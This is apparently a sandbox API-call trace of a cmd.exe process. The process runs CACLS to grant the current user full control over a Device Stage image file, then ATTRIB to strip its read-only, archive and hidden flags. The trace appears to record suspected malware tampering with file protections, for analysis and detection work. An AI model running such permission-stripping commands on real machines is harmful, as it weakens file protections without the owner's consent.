name = "pagefile_0x0000000000010000" filename = "" Region: id = 18971 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18972 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18973 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18974 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 18975 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18976 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18977 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18978 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18979 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18980 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18981 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18982 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18983 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18984 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18985 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18986 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18987 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 18988 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18989 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18990 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 18991 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 18992 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 18993 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 18994 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 284 os_tid = 0xc20 [0148.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fcfc | out: lpSystemTimeAsFileTime=0x30fcfc*(dwLowDateTime=0x92b6fec0, dwHighDateTime=0x1d440a9)) [0148.952] GetCurrentProcessId () returned 0xb00 [0148.952] GetCurrentThreadId () returned 0xc20 [0148.952] GetTickCount () returned 0x2e2c0 [0148.952] QueryPerformanceCounter (in: lpPerformanceCount=0x30fcf4 | out: lpPerformanceCount=0x30fcf4*=20574136324) returned 1 [0148.953] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0148.953] __set_app_type (_Type=0x1) [0148.953] __p__fmode () returned 0x76b331f4 [0148.953] __p__commode () returned 0x76b331fc [0148.953] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0148.953] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0148.953] GetCurrentThreadId () returned 0xc20 [0148.954] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc20) returned 0x38 [0148.954] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.954] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0148.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0148.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc8c | out: phkResult=0x30fc8c*=0x0) returned 0x2 [0148.954] VirtualQuery (in: lpAddress=0x30fcc3, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.954] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fc5c, dwLength=0x1c | out: lpBuffer=0x30fc5c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0148.954] GetConsoleOutputCP () returned 0x1b5 [0148.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.955] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0148.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0148.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.955] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.955] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.956] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.956] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0148.956] GetEnvironmentStringsW () returned 0x420370* [0148.956] FreeEnvironmentStringsW (penv=0x420370) returned 1 [0148.956] GetEnvironmentStringsW () returned 0x420370* [0148.956] FreeEnvironmentStringsW (penv=0x420370) returned 1 [0148.956] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebfc | out: phkResult=0x30ebfc*=0x40) returned 0x0 [0148.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x20, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x0, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegCloseKey (hKey=0x40) returned 0x0 [0148.957] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebfc | out: phkResult=0x30ebfc*=0x40) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x40, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x1, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x0, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x9, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x4, lpData=0x30ec08*=0x9, lpcbData=0x30ec00*=0x4) returned 0x0 [0148.957] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ec04, lpData=0x30ec08, lpcbData=0x30ec00*=0x1000 | out: lpType=0x30ec04*=0x0, lpData=0x30ec08*=0x9, lpcbData=0x30ec00*=0x1000) returned 0x2 [0148.957] RegCloseKey (hKey=0x40) returned 0x0 [0148.957] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886377 [0148.957] srand (_Seed=0x5b886377) [0148.957] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" [0148.957] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" [0148.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.958] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x421ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0148.958] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.958] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.958] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.958] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0148.958] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0148.958] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0148.959] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0148.959] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0148.959] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0148.959] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0148.959] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0148.959] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0148.959] GetEnvironmentStringsW () returned 0x4224c0* [0148.959] FreeEnvironmentStringsW (penv=0x4224c0) returned 1 [0148.959] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.959] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.959] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0148.959] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0148.959] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0148.959] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0148.959] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0148.959] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0148.959] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0148.959] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0148.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f9c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.959] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f9c8, lpFilePart=0x30f9c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f9c4*="Desktop") returned 0x18 [0148.960] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.960] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f744 | out: lpFindFileData=0x30f744) returned 0x420b50 [0148.960] FindClose (in: hFindFile=0x420b50 | out: hFindFile=0x420b50) returned 1 [0148.960] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f744 | out: lpFindFileData=0x30f744) returned 0x420b50 [0148.960] FindClose (in: hFindFile=0x420b50 | out: hFindFile=0x420b50) returned 1 [0148.960] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f744 | out: lpFindFileData=0x30f744) returned 0x420b50 [0148.960] FindClose (in: hFindFile=0x420b50 | out: hFindFile=0x420b50) returned 1 [0148.960] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.961] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0148.961] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0148.961] GetEnvironmentStringsW () returned 0x420370* [0148.961] FreeEnvironmentStringsW (penv=0x420370) returned 1 [0148.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.961] GetConsoleOutputCP () returned 0x1b5 [0148.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.962] GetUserDefaultLCID () returned 0x409 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fb08, cchData=128 | out: lpLCData="0") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fb08, cchData=128 | out: lpLCData="0") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fb08, cchData=128 | out: lpLCData="1") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0148.962] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0148.963] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0148.963] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0148.964] GetConsoleTitleW (in: lpConsoleTitle=0x410a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.964] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.964] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0148.964] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0148.964] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0148.965] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0148.966] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0148.966] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0148.966] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0148.966] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0148.966] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0148.966] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0148.966] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0148.971] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0148.971] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0148.971] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0148.971] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0148.971] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0148.971] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0148.971] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0148.975] SetErrorMode (uMode=0x0) returned 0x0 [0148.975] SetErrorMode (uMode=0x1) returned 0x0 [0148.975] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x422018, lpFilePart=0x30f2bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f2bc*="Desktop") returned 0x18 [0148.976] SetErrorMode (uMode=0x0) returned 0x1 [0148.976] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.976] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.980] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.980] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0148.981] GetLastError () returned 0x2 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0148.981] GetLastError () returned 0x2 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x410f58 [0148.981] FindClose (in: hFindFile=0x410f58 | out: hFindFile=0x410f58) returned 1 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0148.981] GetLastError () returned 0x2 [0148.981] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x410f58 [0148.981] FindClose (in: hFindFile=0x410f58 | out: hFindFile=0x410f58) returned 1 [0148.982] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.982] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.982] GetConsoleTitleW (in: lpConsoleTitle=0x30f530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.982] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f3b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f480 | out: lpAttributeList=0x30f3b8, lpSize=0x30f480) returned 1 [0148.982] UpdateProcThreadAttribute (in: lpAttributeList=0x30f3b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f478, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f3b8, lpPreviousValue=0x0) returned 1 [0148.982] GetStartupInfoW (in: lpStartupInfo=0x30f374 | out: lpStartupInfo=0x30f374*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.982] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.983] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f414*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f460 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30f460*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc00, dwThreadId=0xb7c)) returned 1 [0148.986] CloseHandle (hObject=0x4c) returned 1 [0148.986] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.986] GetEnvironmentStringsW () returned 0x4204e0* [0148.986] FreeEnvironmentStringsW (penv=0x4204e0) 